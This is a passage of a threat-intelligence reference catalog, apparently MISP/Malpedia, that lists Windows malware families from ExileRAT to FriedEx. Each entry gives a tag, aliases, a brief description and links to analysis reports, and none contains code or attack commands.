ExileRAT is a simple RAT platform capable of getting information on the system (computer name, username, listing drives, network adapter, process name), getting/pushing files and executing/terminating processes.

The tag is: misp-galaxy:malpedia="Exile RAT"

Exile RAT is also known as:

Table 1797. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.exilerat
https://blog.talosintelligence.com/2019/02/exilerat-shares-c2-with-luckycat.html

Exorcist

Ransomware.

The tag is: misp-galaxy:malpedia="Exorcist"

Exorcist is also known as:

Table 1798. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.exorcist
https://medium.com/@velasco.l.n/exorcist-ransomware-from-triaging-to-deep-dive-5b7da4263d81

Xtreme RAT

The tag is: misp-galaxy:malpedia="Xtreme RAT"

Xtreme RAT is also known as:

ExtRat

Table 1799. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.extreme_rat
https://www2.slideshare.net/ChiEnAshleyShen/hitcon-2020-cti-village-threat-hunting-and-campaign-tracking-workshoppptx/1
https://www.secureworks.com/research/threat-profiles/aluminum-saratoga
https://www.symantec.com/connect/blogs/colombians-major-target-email-campaigns-delivering-xtreme-rat
https://malware.lu/articles/2012/07/22/xtreme-rat-analysis.html
https://www.fireeye.com/blog/threat-research/2014/02/xtremerat-nuisance-or-threat.html
https://blogs.360.cn/post/APT-C-44.html
https://community.rsa.com/community/products/netwitness/blog/2017/08/02/malspam-delivers-xtreme-rat-8-1-2017
https://citizenlab.ca/2015/12/packrat-report/
https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g

Eye Pyramid

The tag is: misp-galaxy:malpedia="Eye Pyramid"

Eye Pyramid is also known as:

Table 1800. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.eye_pyramid
http://blog.talosintel.com/2017/01/Eye-Pyramid.html
https://securelist.com/blog/incidents/77098/the-eyepyramid-attacks/

EYService

EYService is the main part of the backdoor used by Nazar APT. This a passive backdoor that relies on, now discontinued, Packet Sniffer SDK (PSSDK) from Microolap.

The tag is: misp-galaxy:malpedia="EYService"

EYService is also known as:

Table 1801. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.eyservice
https://blog.malwarelab.pl/posts/nazar_eyservice_comm/
https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf
https://blog.malwarelab.pl/posts/nazar_eyservice/
https://www.epicturla.com/blog/the-lost-nazar
https://research.checkpoint.com/2020/nazar-spirits-of-the-past/

FakeRean

The tag is: misp-galaxy:malpedia="FakeRean"

FakeRean is also known as:

Braviax

Table 1802. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean
https://0x3asecurity.wordpress.com/2015/11/30/134260124544/
https://www.exploit-db.com/docs/english/18387-malware-reverse-engineering-part-1---static-analysis.pdf
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Win32/FakeRean#technicalDiv

FakeTC

The tag is: misp-galaxy:malpedia="FakeTC"

FakeTC is also known as:

Table 1803. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.faketc
http://www.welivesecurity.com/2015/07/30/operation-potao-express/
https://www.welivesecurity.com/wp-content/uploads/2015/07/Operation-Potao-Express_final_v2.pdf

FakeWord

The tag is: misp-galaxy:malpedia="FakeWord"

FakeWord is also known as:

Table 1804. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fakeword
https://blog.trendmicro.com/trendlabs-security-intelligence/kivars-with-venom-targeted-attacks-upgrade-with-64-bit-support/

fancyfilter

FancyFilter is a piece of code that documents code overlap between frameworks used by Regin and Equation Group.

The tag is: misp-galaxy:malpedia="fancyfilter"

fancyfilter is also known as:

0xFancyFilter

Table 1805. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter
https://www.epicturla.com/previous-works/hitb2020-voltron-sta

Fanny

The tag is: misp-galaxy:malpedia="Fanny"

Fanny is also known as:

DEMENTIAWHEEL

Table 1806. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fanny
https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/
https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf
https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1
https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/

FantomCrypt

The tag is: misp-galaxy:malpedia="FantomCrypt"

FantomCrypt is also known as:

Table 1807. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fantomcrypt
https://www.webroot.com/blog/2016/08/29/fantom-ransomware-windows-update/

Farseer

The tag is: misp-galaxy:malpedia="Farseer"

Farseer is also known as:

Table 1808. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer
https://unit42.paloaltonetworks.com/farseer-previously-unknown-malware-family-bolsters-the-chinese-armoury/
https://unit42.paloaltonetworks.com/pkplug_chinese_cyber_espionage_group_attacking_asia/
https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-pulling-pkplug-adversary-playbook-long-standing-espionage-activity-chinese-nation-state-adversary/

FastLoader

FastLoader is a small .NET downloader, which name comes from PDB strings seen in samples. It typically downloads TrickBot. It may create a list of processes and uploads it together with screenshot(s). In more recent versions, it employs simple anti-analysis checks (VM detection) and comes with string obfuscations.

The tag is: misp-galaxy:malpedia="FastLoader"

FastLoader is also known as:

Table 1809. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fastloader

FastPOS

The tag is: misp-galaxy:malpedia="FastPOS"

FastPOS is also known as:

Table 1810. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fast_pos
https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-quick-and-easy-credit-card-theft/
https://www.justice.gov/opa/pr/malware-author-pleads-guilty-role-transnational-cybercrime-organization-responsible-more-568
https://blog.trendmicro.com/trendlabs-security-intelligence/fastpos-updates-in-time-for-retail-sale-season/
http://documents.trendmicro.com/assets/fastPOS-quick-and-easy-credit-card-theft.pdf
http://documents.trendmicro.com/assets/Appendix%20-%20FastPOS%20Updates%20in%20Time%20for%20the%20Retail%20Sale%20Season.pdf

FatalRat

The tag is: misp-galaxy:malpedia="FatalRat"

FatalRat is also known as:

Table 1811. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fatal_rat
https://cybersecurity.att.com/blogs/labs-research/new-sophisticated-rat-in-town-fatalrat-analysis

FatDuke

According to ESET Research, FatDuke is the current flagship backdoor of APT29 and is only deployed on the most interesting machines. It is generally dropped by the MiniDuke backdoor, but ESET also have seen the operators dropping FatDuke using lateral movement tools such as PsExec.The operators regularly repack this malware in order to evade detections. The most recent sample of FatDuke that ESET have seen was compiled on May 24, 2019. They have seen them trying to regain control of a machine multiple times in a few days, each time with a different sample. Their packer, described in a later section, adds a lot of code, leading to large binaries. While the effective code should not be larger than 1MB, ESET have seen one sample weighing in at 13MB, hence our name for this backdoor component: FatDuke.

The tag is: misp-galaxy:malpedia="FatDuke"

FatDuke is also known as:

Table 1812. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fatduke
https://www.secureworks.com/research/threat-profiles/iron-hemlock
https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

FCT

Ransomware.

The tag is: misp-galaxy:malpedia="FCT"

FCT is also known as:

Table 1813. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fct
https://id-ransomware.blogspot.com/2020/02/fct-ransomware.html

Felismus

The tag is: misp-galaxy:malpedia="Felismus"

Felismus is also known as:

Table 1814. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.felismus
https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

Felixroot

The tag is: misp-galaxy:malpedia="Felixroot"

Felixroot is also known as:

Table 1815. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.felixroot
https://medium.com/@Sebdraven/when-a-malware-is-more-complex-than-the-paper-5822fc7ff257
https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf
https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html

Feodo

Feodo (also known as Cridex or Bugat) is a Trojan used to commit e-banking fraud and to steal sensitive information from the victims computer, such as credit card details or credentials.

The tag is: misp-galaxy:malpedia="Feodo"

Feodo is also known as:

Bugat
Cridex

Table 1816. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.feodo
http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html
https://feodotracker.abuse.ch/
https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/
https://en.wikipedia.org/wiki/Maksim_Yakubets
http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html

Ficker Stealer

The tag is: misp-galaxy:malpedia="Ficker Stealer"

Ficker Stealer is also known as:

Table 1817. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer
https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf
https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf
https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a
https://twitter.com/3xp0rtblog/status/1321209656774135810
https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market
https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon
https://blogs.blackberry.com/en/2021/08/threat-thursday-ficker-infostealer-malware
https://www.bleepingcomputer.com/news/security/fake-microsoft-store-spotify-sites-spread-info-stealing-malware/

FileIce

The tag is: misp-galaxy:malpedia="FileIce"

FileIce is also known as:

Table 1818. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fileice_ransom
https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/

Filerase

Filerase is a .net API-based utility capable of propagating and recursively deleting files.

The tag is: misp-galaxy:malpedia="Filerase"

Filerase is also known as:

Table 1819. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.filerase
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail

Final1stSpy

The tag is: misp-galaxy:malpedia="Final1stSpy"

Final1stSpy is also known as:

Table 1820. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy
https://www.intezer.com/apt37-final1stspy-reaping-the-freemilk/

FindPOS

The tag is: misp-galaxy:malpedia="FindPOS"

FindPOS is also known as:

Poseidon

Table 1821. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.findpos
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://researchcenter.paloaltonetworks.com/2015/03/findpos-new-pos-malware-family-discovered/
https://blogs.cisco.com/security/talos/poseidon

FinFisher RAT

FinFisher is a commercial software used to steal information and spy on affected victims. It began with few functionalities which included password harvesting and information leakage, but now it is mostly known for its full Remote Access Trojan (RAT) capabilities. It is mostly known for being used in governmental targeted and lawful criminal investigations. It is well known for its anti-detection capabilities and use of VMProtect.

The tag is: misp-galaxy:malpedia="FinFisher RAT"

FinFisher RAT is also known as:

FinSpy

Table 1822. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.finfisher
https://www.welivesecurity.com/2017/09/21/new-finfisher-surveillance-campaigns/
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://artemonsecurity.blogspot.de/2017/01/finfisher-rootkit-analysis.html
https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/
https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/
https://www.codeandsec.com/FinFisher-Malware-Analysis-Part-2
https://securelist.com/finspy-unseen-findings/104322/
https://securelist.com/blackoasis-apt-and-new-targeted-attacks-leveraging-zero-day-exploit/82732/
https://www.welivesecurity.com/wp-content/uploads/2018/01/WP-FinFisher.pdf
http://www.msreverseengineering.com/blog/2018/1/23/a-walk-through-tutorial-with-code-on-statically-unpacking-the-finspy-vm-part-one-x86-deobfuscation
https://securelist.com/apt-trends-report-q2-2019/91897/
https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/
https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html
https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Fireball

The tag is: misp-galaxy:malpedia="Fireball"

Fireball is also known as:

Table 1823. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball
http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/

FireBird RAT

The tag is: misp-galaxy:malpedia="FireBird RAT"

FireBird RAT is also known as:

Table 1824. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.firebird_rat
https://twitter.com/casual_malware/status/1237775601035096064

FireCrypt

The tag is: misp-galaxy:malpedia="FireCrypt"

FireCrypt is also known as:

Table 1825. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt
https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/

FireMalv

The tag is: misp-galaxy:malpedia="FireMalv"

FireMalv is also known as:

Table 1826. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.firemalv
https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf

FirstRansom

The tag is: misp-galaxy:malpedia="FirstRansom"

FirstRansom is also known as:

Table 1827. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom
https://twitter.com/JaromirHorejsi/status/815949909648150528

FiveHands

The tag is: misp-galaxy:malpedia="FiveHands"

FiveHands is also known as:

Table 1828. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fivehands
https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/
https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html
https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b
https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

Flame

The tag is: misp-galaxy:malpedia="Flame"

Flame is also known as:

sKyWIper

Table 1829. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.flame
https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf
https://securelist.com/the-flame-questions-and-answers-51/34344/
https://www.crysys.hu/publications/files/skywiper.pdf
https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf
https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments
https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache

FLASHFLOOD

 FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the
removable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information
or contacts.

The tag is: misp-galaxy:malpedia="FLASHFLOOD"

FLASHFLOOD is also known as:

Table 1830. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

FlawedAmmyy

FlawedAmmyy is a well-known Remote Access Tool (RAT) attributed to criminal gang TA505 and used to get the control of target machines. The name reminds the strong link with the leaked source code of Ammyy Admin from which it took the main structure.

The tag is: misp-galaxy:malpedia="FlawedAmmyy"

FlawedAmmyy is also known as:

Table 1831. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy
https://www.youtube.com/watch?v=N4f2e8Mygag
https://habr.com/ru/company/pt/blog/475328/
https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/
https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://attack.mitre.org/software/S0381/
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://www.secureworks.com/research/threat-profiles/gold-tahoe
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/
https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/
https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks
https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do
https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/
https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat
https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/
https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf
https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat

FlawedGrace

According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed in the second half of 2017 mainly.

FlawedGrace uses a series of commands: FlawedGrace also uses a series of commands, provided below for reference: * desktop_stat * destroy_os * target_download * target_module_load * target_module_load_external * target_module_unload * target_passwords * target_rdp * target_reboot * target_remove * target_script * target_servers * target_update * target_upload

The tag is: misp-galaxy:malpedia="FlawedGrace"

FlawedGrace is also known as:

GraceWire

Table 1832. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://twitter.com/MsftSecIntel/status/1273359829390655488
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505
https://www.secureworks.com/research/threat-profiles/gold-tahoe
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672
https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem

FlexiSpy (Windows)

The tag is: misp-galaxy:malpedia="FlexiSpy (Windows)"

FlexiSpy (Windows) is also known as:

Table 1833. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.flexispy
https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/

FlokiBot

The tag is: misp-galaxy:malpedia="FlokiBot"

FlokiBot is also known as:

Table 1834. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot
https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/
https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/
https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/
http://adelmas.com/blog/flokibot.php
http://blog.talosintel.com/2016/12/flokibot-collab.html#more
https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/
https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html

FlowCloud

The tag is: misp-galaxy:malpedia="FlowCloud"

FlowCloud is also known as:

Table 1835. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud
https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis
https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new
https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/
https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape
https://nao-sec.org/2021/01/royal-road-redive.html

FlowerShop

The tag is: misp-galaxy:malpedia="FlowerShop"

FlowerShop is also known as:

Table 1836. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop
https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf
https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf

Floxif

The tag is: misp-galaxy:malpedia="Floxif"

Floxif is also known as:

Table 1837. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif
https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library

Flusihoc

Available since 2015, Flusihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Flusihoc communicates with its C2 via HTTP in plain text.

The tag is: misp-galaxy:malpedia="Flusihoc"

Flusihoc is also known as:

Table 1838. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.flusihoc
https://www.arbornetworks.com/blog/asert/the-flusihoc-dynasty-a-long-standing-ddos-botnet/

FlyingDutchman

The tag is: misp-galaxy:malpedia="FlyingDutchman"

FlyingDutchman is also known as:

Table 1839. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman
https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/

FlyStudio

The tag is: misp-galaxy:malpedia="FlyStudio"

FlyStudio is also known as:

Table 1840. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.flystudio
https://www.eset.com/int/about/newsroom/press-releases/announcements/press-threatsense-report-july-2009/

Fobber

The tag is: misp-galaxy:malpedia="Fobber"

Fobber is also known as:

Table 1841. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber
https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/
http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf
https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber
http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html
http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html

FONIX

The tag is: misp-galaxy:malpedia="FONIX"

FONIX is also known as:

Table 1842. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix
https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/
https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/

Formbook

FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.

The tag is: misp-galaxy:malpedia="Formbook"

Formbook is also known as:

win.xloader

Table 1843. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/
https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf
https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/
http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html
https://link.medium.com/uaBiIXgUU8
https://usualsuspect.re/article/formbook-hiding-in-plain-sight
https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer
https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/
https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent
https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html
https://isc.sans.edu/diary/26806
https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view
https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/
https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko
https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/
https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/
https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?
https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html
https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/
https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/
https://news.sophos.com/en-us/2020/05/14/raticate/
https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/
https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html
https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii
http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/
https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://youtu.be/aQwnHIlGSBM
https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware
http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html
https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/
https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I
https://blog.talosintelligence.com/2018/06/my-little-formbook.html
https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html

FormerFirstRAT

The tag is: misp-galaxy:malpedia="FormerFirstRAT"

FormerFirstRAT is also known as:

ffrat

Table 1844. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat
https://threatvector.cylance.com/en_us/home/breaking-down-ff-rat-malware.html
https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/

FortuneCrypt

The tag is: misp-galaxy:malpedia="FortuneCrypt"

FortuneCrypt is also known as:

Table 1845. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.fortunecrypt
https://securelist.com/ransomware-two-pieces-of-good-news/93355/

FRat

A RAT employing Node.js, Sails, and Socket.IO to collect information on a target

The tag is: misp-galaxy:malpedia="FRat"

FRat is also known as:

Table 1846. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.frat
https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md

Freenki Loader

The tag is: misp-galaxy:malpedia="Freenki Loader"

Freenki Loader is also known as:

Table 1847. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki
https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/
https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html
http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html
https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html

FriedEx

The tag is: misp-galaxy:malpedia="FriedEx"

FriedEx is also known as:

BitPaymer
DoppelPaymer
IEncrypt

Table 1848. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex
https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/
https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/
https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/
https://sites.temple.edu/care/ci-rw-attacks/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/
